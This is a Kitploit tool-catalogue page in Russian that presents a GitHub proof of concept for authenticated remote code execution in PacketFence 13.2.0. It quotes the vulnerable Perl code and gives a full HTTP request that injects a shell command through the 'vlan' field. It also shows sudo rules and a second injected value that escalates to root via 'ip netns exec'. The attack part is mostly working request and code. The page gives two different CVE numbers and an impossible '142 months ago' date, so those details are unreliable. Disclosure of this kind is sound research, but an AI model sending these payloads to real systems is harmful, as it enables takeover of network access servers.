Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
packetfence-CVE-2024-39024 — В Packetfence 13.2.0 настройка интерфейса WebGui позволяет аутентифицированное удалённое выполнение кода. | Kitploit
Инструменты/GitHubGitHub/ly1g3/packetfence-cve-2024-39024
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubly1g3/packetfence-cve-2024-39024

packetfence-CVE-2024-39024

В Packetfence 13.2.0 настройка интерфейса WebGui позволяет аутентифицированное удалённое выполнение кода.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
142 месяцев назадЕщё не проверено

О программе

Исследователь безопасности: ly1g3, ly1g3[at]tuta.io

GPG-отпечаток: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Обзор: удалённое выполнение кода — RCE от аутентифицированного пользователя с низким уровнем привилегий до администратора

CVE: CVE-2024-3924

Хронология:

  • Обнаружено — ly1g3
  • Сообщено — ly1g3
  • Исправлено — packetfence

Ссылка: https://www.packetfence.com/news/2024/packetfence-14-0-released/

Аутентифицированное RCE в Packetfence

В Packetfence 13.2.0 настройка интерфейса WebGui позволяет аутентифицированным пользователям выполнять удалённый код.

Технические детали

От аутентифицированного администратора до root-оболочки

Администрирование -> Конфигурация -> Сетевая конфигурация -> Интерфейсы

Interface.pm: функция create, строка 64 Переменная $vlan_id поступает из пользовательского ввода и проверяется только на стороне клиента

    my $cmd = "sudo ip link add link $physical_interface name $physical_interface.$vlan_id type vlan id $vlan_id";
    eval { $status = pf_run($cmd) };

PoC

burp:

POST /api/v1/config/interfaces HTTP/1.1
Host: 192.168.100.174:1443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Authorization: Bearer AAAAA
Content-Type: application/json
X-Packetfence-Tenant-Id: 1
Content-Length: 494
Origin: https://192.168.100.174:1443
Referer: https://192.168.100.174:1443/admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

{"id":"eth0","prefixRouteName":"","type":"none","additional_listening_daemons":[],"address":"10.0.0.1/24","coa":null,"dhcpd_enabled":null,"dns":null,"high_availability":0,"hwaddr":"AA:AA:AA:AA:AA:64","ifindex":"3","ipaddress":"10.0.0.1","ipv6_address":null,"ipv6_prefix":null,"master":"eth0","name":"eth0","nat_enabled":null,"netmask":"255.255.255.0","network":"10.0.0.0","networks":[],"reg_network":null,"split_network":null,"tenant_id":1,"vip":null,"vlan":"$(echo 'win'>> /tmp/perl_log.txt)"}

Повышение привилегий:

gtfobins

$ sudo -l
Matching Defaults entries for pf on packetfence:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !requiretty

Runas and Command-specific defaults for pf:
    Defaults!/sbin/ip netns exec * !syslog

User pf may run the following commands on packetfence:
    (root) NOPASSWD: /bin/systemctl, /sbin/iptables, /usr/sbin/ip6tables, /usr/sbin/ipset, /sbin/ipset, /sbin/ip,
        /sbin/vconfig, /sbin/route, /usr/bin/systemctl, /usr/bin/tee, /usr/local/pf/sbin/pfdhcplistener, /bin/kill,
        /usr/sbin/freeradius, /usr/sbin/chroot, /usr/local/pf/bin/pfcmd, /usr/sbin/conntrack, /usr/bin/timedatectl,
        /usr/bin/hostnamectl

"vlan":";sudo /usr/sbin/ip netns exec foo id >> /tmp/perl_log.txt ;",
Скачать инструмент